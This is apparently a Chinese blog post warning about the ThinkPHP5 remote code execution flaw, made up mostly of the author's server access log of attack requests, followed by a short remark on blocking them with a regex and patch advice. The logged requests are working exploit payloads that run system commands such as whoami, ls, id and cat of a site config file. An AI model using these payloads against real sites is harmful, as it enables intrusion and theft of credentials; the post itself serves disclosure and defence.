172.68.253.110 - - [12/Dec/2018:19:21:30 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cp%20/home/website/worldnow.tar.gz%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 -
172.68.253.110 - - [12/Dec/2018:19:21:40 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 355
172.68.253.110 - - [12/Dec/2018:19:22:07 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cp%20/home/website/worldnow.tar.gz%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 -
172.68.253.110 - - [12/Dec/2018:19:22:11 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 355
172.68.211.211 - - [12/Dec/2018:19:24:15 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls HTTP/1.1" 404 43043
172.68.211.211 - - [12/Dec/2018:19:24:28 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls HTTP/1.1" 404 43043
162.158.179.19 - - [12/Dec/2018:19:24:46 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cp%20/home/website/worldnow.tar.gz%20/home/website/worldnow/upload HTTP/1.1" 404 42952
162.158.179.19 - - [12/Dec/2018:19:25:06 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 404 42768
162.158.179.19 - - [12/Dec/2018:19:25:08 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 404 43054
172.68.211.211 - - [12/Dec/2018:19:25:18 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls HTTP/1.1" 404 43043
172.68.211.211 - - [12/Dec/2018:19:25:57 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls HTTP/1.1" 404 43043
172.68.211.211 - - [12/Dec/2018:19:26:09 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls HTTP/1.1" 404 43042
162.158.179.19 - - [12/Dec/2018:19:26:26 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/home/website/xxxmall/data/config/config.ini.php HTTP/1.1" 404 43202
172.68.253.158 - - [12/Dec/2018:19:27:10 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 404 43211
172.68.253.158 - - [12/Dec/2018:19:28:20 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 404 43211
162.158.179.175 - - [12/Dec/2018:19:30:33 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/www.xxx.com HTTP/1.1" 404 42857
173.245.48.84 - - [12/Dec/2018:19:32:15 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls HTTP/1.1" 404 43041
162.158.179.175 - - [12/Dec/2018:19:32:21 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 404 42914
172.68.142.86 - - [12/Dec/2018:20:06:03 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/home/website/xxxmall/data/config HTTP/1.1" 404 42872
108.162.226.176 - - [12/Dec/2018:20:11:51 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/application HTTP/1.1" 404 42941
172.68.211.211 - - [12/Dec/2018:20:17:09 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=[0]=system&vars[1][]=ls HTTP/1.1" 404 42483
172.68.255.5 - - [13/Dec/2018:09:52:03 +0800] "GET /trade//index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l HTTP/1.1" 404 42780
108.162.215.85 - - [13/Dec/2018:11:18:59 +0800] "GET /trade/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 404 42766
108.162.215.85 - - [13/Dec/2018:11:19:13 +0800] "GET /trade/index.php?s=../index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 404 42645
108.162.215.85 - - [13/Dec/2018:11:19:20 +0800] "GET /trade/index.php?s=/app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 404 42636
108.162.215.85 - - [13/Dec/2018:11:20:14 +0800] "GET /world/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 404 43040
108.162.215.85 - - [13/Dec/2018:11:21:15 +0800] "GET /world/index.php?s=index/thinkphp\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 404 43058
108.162.215.85 - - [13/Dec/2018:11:21:45 +0800] "GET /world/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 404 43039
108.162.215.85 - - [13/Dec/2018:11:22:34 +0800] "GET /traden//index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 404 7355
108.162.215.85 - - [13/Dec/2018:11:22:46 +0800] "GET /traden//index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1" 404 7355
172.68.47.45 - - [13/Dec/2018:11:22:59 +0800] "GET /traden/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1" 404 7355
172.68.47.45 - - [13/Dec/2018:11:23:30 +0800] "GET /traden/index.php?s=index/\\think\\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1" 404 7355
172.68.47.45 - - [13/Dec/2018:11:23:39 +0800] "GET /traden/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 404 7355
172.68.47.45 - - [13/Dec/2018:11:23:50 +0800] "GET /block//index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 404 214
172.68.47.45 - - [13/Dec/2018:11:24:31 +0800] "GET /world/age/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 404 44896
172.69.33.134 - - [13/Dec/2018:11:25:24 +0800] "GET /en/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 404 210
172.69.33.134 - - [13/Dec/2018:11:25:29 +0800] "GET /index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 404 207
172.69.33.134 - - [13/Dec/2018:11:27:28 +0800] "GET /world/age/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 404 44897
172.69.33.134 - - [13/Dec/2018:11:27:34 +0800] "GET /world/age/index.php?s=age/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 404 44884
172.69.33.134 - - [13/Dec/2018:11:27:45 +0800] "GET /world/age/index.php?s=age/view/blue//think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 404 44813
172.69.33.134 - - [13/Dec/2018:11:27:50 +0800] "GET /world/age/index.php?s=age/view/blue//invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 404 44773
172.69.33.134 - - [13/Dec/2018:11:27:53 +0800] "GET /world/age/index.php?s=/view/blue//invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 404 44666
172.69.33.134 - - [13/Dec/2018:11:27:58 +0800] "GET /world/age/index.php?s=/view/blue/app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 404 44683
172.69.33.134 - - [13/Dec/2018:11:28:18 +0800] "GET /world/age/index.php?s=/app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 404 44677
172.68.211.211 - - [13/Dec/2018:11:35:23 +0800] "HEAD /world/function.asp HTTP/1.1" 404 -
173.245.48.60 - - [13/Dec/2018:11:35:23 +0800] "HEAD /world/function.aspx HTTP/1.1" 404 -
162.158.58.210 - - [13/Dec/2018:11:35:23 +0800] "HEAD /world/function.php HTTP/1.1" 404 -
108.162.215.235 - - [13/Dec/2018:11:43:03 +0800] "HEAD /world/includes/functions.php HTTP/1.1" 404 -
162.158.59.67 - - [13/Dec/2018:11:48:20 +0800] "HEAD /world/function/uploadproductpic.asp HTTP/1.1" 404 -
162.158.59.67 - - [13/Dec/2018:11:48:21 +0800] "HEAD /world/system/function/uploadproductpic.asp HTTP/1.1" 404 -
173.245.48.234 - - [13/Dec/2018:11:48:29 +0800] "HEAD /world/functions.asp HTTP/1.1" 404 -
108.162.215.85 - - [13/Dec/2018:11:49:05 +0800] "HEAD /world/includes/functions.asp HTTP/1.1" 404 -
173.245.48.234 - - [13/Dec/2018:11:49:49 +0800] "HEAD /world/function/uploadproductpic.aspx HTTP/1.1" 404 -
173.245.48.234 - - [13/Dec/2018:11:49:51 +0800] "HEAD /world/system/function/uploadproductpic.aspx HTTP/1.1" 404 -
108.162.215.85 - - [13/Dec/2018:11:50:29 +0800] "HEAD /world/functions.aspx HTTP/1.1" 404 -
173.245.48.84 - - [13/Dec/2018:11:50:31 +0800] "HEAD /world/includes/functions.aspx HTTP/1.1" 404 -
162.158.58.54 - - [13/Dec/2018:12:09:23 +0800] "HEAD /world/system/function/uploadproductpic.php HTTP/1.1" 404 -
162.158.58.54 - - [13/Dec/2018:12:09:23 +0800] "HEAD /world/function/uploadproductpic.php HTTP/1.1" 404 -
162.158.58.54 - - [13/Dec/2018:12:14:51 +0800] "HEAD /world/functions.php HTTP/1.1" 404 -
162.158.58.210 - - [13/Dec/2018:12:25:52 +0800] "HEAD /world/function/ HTTP/1.1" 404 -
162.158.58.210 - - [13/Dec/2018:12:26:34 +0800] "HEAD /world/include/function.asp HTTP/1.1" 404 -

timg.jpg

吓得我赶紧加了个正则 加完就执行不了这个吊东西了 看来是该研究研究wireshark溯源了


QQ截图20181212223639.pngQQ截图20181212223446.png

修复建议

1、官网已发布安全更新,用户可以通过网址 http://www.thinkphp.cn/topic/60400.html  获得.

2、建议使用以上ThinkPHP5 开发的内容管理系统的用户及时检查是否存在该漏洞。

本博客所有文章如无特别注明均为原创。作者:odaycaogen复制或转载请以超链接形式注明转自 123``blog
原文地址《【漏洞预警】ThinkPHP5远程代码执行漏洞

郑重声明:本文只做技术交流学习使用,请尊重当地法规法律,勿对企业或个人网站及app进行破坏。如产生连带法律责任 123``blog 作者本人概不负责。

相关推荐

发表评论

路人甲 表情
看不清楚?点图切换 Ctrl+Enter快速提交

网友评论(0)